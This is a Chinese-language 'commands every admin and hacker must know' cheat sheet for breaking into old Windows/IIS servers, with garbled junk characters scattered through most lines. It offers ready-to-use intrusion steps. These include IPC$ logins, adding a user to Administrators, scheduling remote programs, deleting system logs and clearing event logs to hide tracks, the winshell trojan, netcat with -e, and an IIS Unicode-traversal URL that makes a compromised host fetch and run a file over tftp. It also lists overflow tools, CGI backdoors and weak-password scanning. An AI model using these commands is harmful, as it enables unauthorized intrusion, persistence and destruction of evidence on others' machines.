网管和黑客都必须知道的命令
gY0*u+LF 常用的几条NET命令:
IUd>jHp`6 A!^K:S:@ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
/bCrpcH fS#/-wugOB (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
b@YSrjJ rA=F:N
2 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
jv2l_ m.K"IXD (查看远程主机时间) net time \\IP地址
]?``*{Zqy ;k
b^mJE (定时启动某个程序) at \\IP地址 02:18 readme.exe
h(/|` @TgCI`E (查看共享) net view \\IP地址
@Jm$<E fvit+ (查看netbios工作组列表) nbtstat -A IP地址
dUO~dV1 EzNmsbtZ( (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
aF'Ik XG d g?=B{V (这两条把自己增加到管理员组): net user 用户名 密码 /add
}d.R=A9L $,i:#KT` net localgroup Administrators 用户名 /add
K:'pK1zy FC]? T (断开连接) net use \\IP地址\ipc$ /delete
/2l4'Q= r}hj,Sq' 扫尾:
-8 &f=J) $6y1';A del C:\winnt\system32\logfiles\*.*
G Q8I |E <R3S{ty del C:\winnt\ssytem32\config\*.evt
EXJ>Z B/5C jHz del C:\winnt\system32\dtclog\*.*
ev8E.ehD }1R k]$XC del C:\winnt\system32\*.log
{ +C>^b I5x/N. del C:\winnt\system32\*.txt
&7@6Y{!/
2YwV} del C:\winnt\*.txt
5j]}/Aq {xM%3 del C:\winnt\*.log
N#,4BU k(^zhET 一、netsvc.exe
HwU \[f *39sh[*} 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
WX0@H[$i# y~-? netsvc /list \\IP地址
W
8E<P y #mllVQ netsvc schedule \\IP地址 /query
vjXvjv{t ).ugMuk netsvc \\IP地址 schedule /start
PFPfLxna 1Eg}qU,: 二、OpenTelnet.exe
~Zj?%4 a[(n91J0 远程启动主机的Telnet服务,并绑定端口到7878,例如:
i( c2NPbX Q;aZpi-E" OpenTelnet \\IP地址 用户名 密码 1 7878
u|QfCwQ /@wm?ft6Gk 然后就可以telnet到主机的7878端口,进入DOS方式下:
8|d[45*q 4yBe(&N-d telnet IP地址 7878
{.!:T+'Xi\ mDM]RAub) 三、winshell.exe
" jeJV,% -Q$$2QW! 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
5n9F\T5 sWX p Path (查看winshell主程序的路径信息)
%<
W1y " g_\W b reBoot (重新启动机器)
BV!Kiw `E|IMUB~ d shutDown (关闭机器)
we} sC, ;bAy7 s Shell (执行后你就会看到可爱的“C:\>”)
gsU&}R1*h 8"<!8Img x eXit (退出本次登录会话,此命令并不终止winshell的运行)
W
B!$qie\ (yX Vp2k CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
N`zHe*=[~ g:2/!tujL 四、3389登陆器,GUI方式登录远程主机的
mB1)! "n8_Ag@r 五、elsave.exe
;l`8w3fDt u@gYEx} 事件日志清除工具
(>8fcQUBb N@A#e/8 elsave -s \\IP地址 -l "application" -C
F8=6!Qj G4RsH/ elsave -s \\IP地址 -l "system" -C
Ko%rB+d o&CvjE
elsave -s \\IP地址 -l "security" -C
Wc]Fg9E ~Snw': 执行后成功清除应用程序日志,系统日志,安全日志
qy-BZ%3 `nizGg~1 六、hbulot.exe
mYy3KqYu d->b9 开启win2kserver和winxp的3389服务
:ZzG5[o3 O!j@8~=' hbulot [/r]
p[/n[@<8= XBr>K>( 使用/r表示安装完成后自动重起目标使设置生效。
NKB!_R+ I+<`} 七、nc.exe(netcat.exe)
nB:Bw8U"Q de`6%%| 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
mWGT
(`|~/ Awr]@%I 想要连接到某处: nc [-options] hostname port[s] [ports] ...
5S7Z]DXiT8 CY7REF 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
M 0"feq lO) B/N& 参数:
Tl1?5 ~]yqJYiid^ -e prog 程序重定向,一旦连接,就执行 [危险!!]
my} P\r. -#i%4[v -g gateway source-routing hop point[s], up to 8
3{_+dE"9 G6J3F -G num source-routing pointer: 4, 8, 12, ...
,>g
6OU2~6 .6'T;SoK> -h 帮助信息
J`V6zGgW 1U9iNki -i secs 延时的间隔
UbYKiLDF) Mr1pRIYMd -l 监听模式,用于入站连接
:5Vu.\,1 K{iayg!k -n 指定数字的IP地址,不能用hostname
*1%g=vb {Ise (>V -o file 记录16进制的传输
zCQv:.0L TxiJ?sDh* -p port 本地端口号
DBv5Og es6e-y@e -r 任意指定本地及远程端口
pE`(kD \UC4ai2MK -s addr 本地源地址
1rKR=To gTq-\k( -u UDP模式
bc"{ZL!C zH_q6@4 -v 详细输出——用两个-v可得到更详细的内容
NKGCz|-
9 D H.ljGb -w secs timeout的时间
3dM6zOK @V-ZV -z 将输入输出关掉——用于扫描时
F-R`'{ ka 八、TFTPD32.EXE
c49#aNR AH}
nTm 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
#zQkQvAT9 rvG qUmSUs http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
cK258mY dn5v|[ dJ 然后可以直接令文件运行:
4v!@9.!vQ
~ 52 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
q"cFw${
|z4 /4Y@ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
H}@|ucM"\ 2KG j !w 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
p<+]+,|\~: W`\H3?C`xQ 一、一 Xscan命令行运行参数说明:
~\/ J& y#MLxm 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
a=J?[qrx CVUDN2 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
A1@-;/H3 -Rvxjy)[N xscan -file <主机列表文件名> <检测项目> [其他选项]
.d fTv/n 3}+/\:q* 其中<检测项目> 含义如下:
X}!_p& WI U!'lc}5 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
/}VQzF she`_'?5 -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
r" D |1 \xdt|:8 -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
xvkof
'Q) yO6i "3 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
u7;A` i~.[iZf| -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
V.4j?\#% I*ej_cFQ^ [其他选项] 含义如下:
}n.h)Oz pta%%8": -v: 显示详细扫描进度
|Bn=$T] -Z Z$
1E -p: 跳过Ping不通的主机
06`__$@h _(jE](, -o: 跳过没有检测到开放端口的主机
w(yU\
N 08f~vw" -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10